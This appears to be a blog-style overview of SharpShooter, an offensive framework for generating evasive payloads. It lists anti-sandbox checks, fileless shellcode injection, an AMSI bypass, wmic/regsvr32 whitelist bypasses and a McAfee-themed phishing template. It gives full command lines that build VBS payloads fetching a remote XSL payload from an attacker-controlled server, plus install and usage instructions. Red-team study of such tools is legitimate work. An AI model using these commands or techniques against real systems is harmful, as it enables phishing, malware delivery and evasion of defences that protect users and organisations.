Payload Generation Framework – SharpShooter

Introduction

Increased use of PowerShell attacks led to the fact that they are much better logged and detected today. Yes, PowerShell is flexible, but we needed urgent alternatives. Everyone started to turn to C# and the .NET utilities to execute code on Windows. That’s how SharpShooter, payload generation framework, came out.

SharpShooter is a weaponised payload generation framework with anti-sandbox analysis, staged and stageless payload execution and support for evading ingress monitoring.

Payload Generation Framework: SharpShooter

SharpShooter is a payload generation framework for the retrieval and execution of arbitrary CSharp source code. This penetration framework leverages James Forshaw’s DotNetToJavaScript tool and supports the ability to create payloads in a wide variety of formats, such as:

• HTA, JS, VBS, JSE, VBA, VBE and WSF.

Features:

• Sandbox Detection : several default techniques to evade detection, including identifying tools
• Stageless Execution : with ability to inject an in-memory shellcode directly into the process, this framework supports full fileless mode
• XSL Exploitation : (Squiblytwo) bypasses signatures and security solutions by executing XSL (eXtensible Stylesheet Language) full trust scripts from the WMIC command line
• Squiblydoo and Squiblytwo support: COM Staging and XSL Exploitation directly through COM
• AMSI Bypass : uses XPath expression on the XSL file to bypass Windows Defender AMSI signature

Sandbox Detection

Since SharpShooter has several default techniques to evade detection, including identifying tools, you can choose some or all of them. The payload will not execute if the conditions of the selected sandbox detection techniques are met.

• Key to Domain: the payload will only execute on a specific domain;
• Ensure Domain Joined: will only execute if the workstation is domain joined;
• Check for Sandbox Artifacts: search the file system for artifacts of known sandbox technologies and virtualisation systems, if found the payload will not execute;
• Check for Bad MACs: check the MAC address of the system, if the vendor matches known virtualisation software it will not execute;
• Check for Debugging: if the payload is being debugged, it will not execute.

Stageless Execution

SharpShooter supports both staged and stageless payload execution. With ability to inject an in-memory shellcode directly into the process, this framework supports full fileless mode.

• MacAfee HTML template – if user clicks phishing link, it will open JavaScript file, and the shellcode will be executed.

Squiblydoo and Squiblytwo

Sharpshooter supports Squiblydoo and SquiblyTwo attacks.

• One-liners using a COM interface (COM Staging):
  Sharpshooter would now create either a XSL or SCT hosted payload, and the script based payload would be a COM stager in either HTA, VBS, JS, WSF or similar formats, to execute either wmic.exe or regsvr32.exe
  

  ---

  
  

  ---

  The following command will generate this with SharpShooter:

  python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook -awl wmic --awlurl http://192.168.2.8:8080/foo.xsl

• XSL Exploitation directly through COM
  The benefit of this technique is that you’re able to somewhat avoid some of the indicators associated with the wmic.exe and regsvr32.exe techniques, in particular there is no risk of being detected through command-line logging.
  

  ---

  
  

  ---

  This technique can be used by running:

  python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x64payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl

Install

Clone it from the github:

git clone https://github.com/mdsecactivebreach/SharpShooter.git

Usage

To see available options, methods and techniques, just type --help:

usage: SharpShooter.py [-h] [--stageless] [--dotnetver <ver>] [--com <com>]
                       [--awl <awl>] [--awlurl <awlurl>] [--payload <format>]
                       [--sandbox <types>] [--amsi <amsi>] [--delivery <type>]
                       [--rawscfile <path>] [--shellcode] [--scfile <path>]
                       [--refs <refs>] [--namespace <ns>] [--entrypoint <ep>]
                       [--web <web>] [--dns <dns>] [--output <output>]
                       [--smuggle] [--template <tpl>]

optional arguments:
  -h, --help          show this help message and exit
  --stageless         Create a stageless payload
  --dotnetver <ver>   Target .NET Version: 2 or 4
  --com <com>         COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
  --awl <awl>         Application Whitelist Bypass Technique: wmic, regsvr32
  --awlurl <awlurl>   URL to retrieve XSL/SCT payload
  --payload <format>  Payload type: hta, js, jse, vba, vbe, vbs, wsf
  --sandbox <types>   Anti-sandbox techniques:
                      [1] Key to Domain (e.g. 1=CONTOSO)
                      [2] Ensure Domain Joined
                      [3] Check for Sandbox Artifacts
                      [4] Check for Bad MACs
                      [5] Check for Debugging
  --amsi <amsi>       Use amsi bypass technique: amsienable
  --delivery <type>   Delivery method: web, dns, both
  --rawscfile <path>  Path to raw shellcode file for stageless payloads
  --shellcode         Use built in shellcode execution
  --scfile <path>     Path to shellcode file as CSharp byte array
  --refs <refs>       References required to compile custom CSharp,
                      e.g. mscorlib.dll,System.Windows.Forms.dll
  --namespace <ns>    Namespace for custom CSharp,
                      e.g. Foo.bar
  --entrypoint <ep>   Method to execute,
                      e.g. Main
  --web <web>         URI for web delivery
  --dns <dns>         Domain for DNS delivery
  --output <output>   Name of output file (e.g. maldoc)
  --smuggle           Smuggle file inside HTML
  --template <tpl>    Name of template file (e.g. mcafee)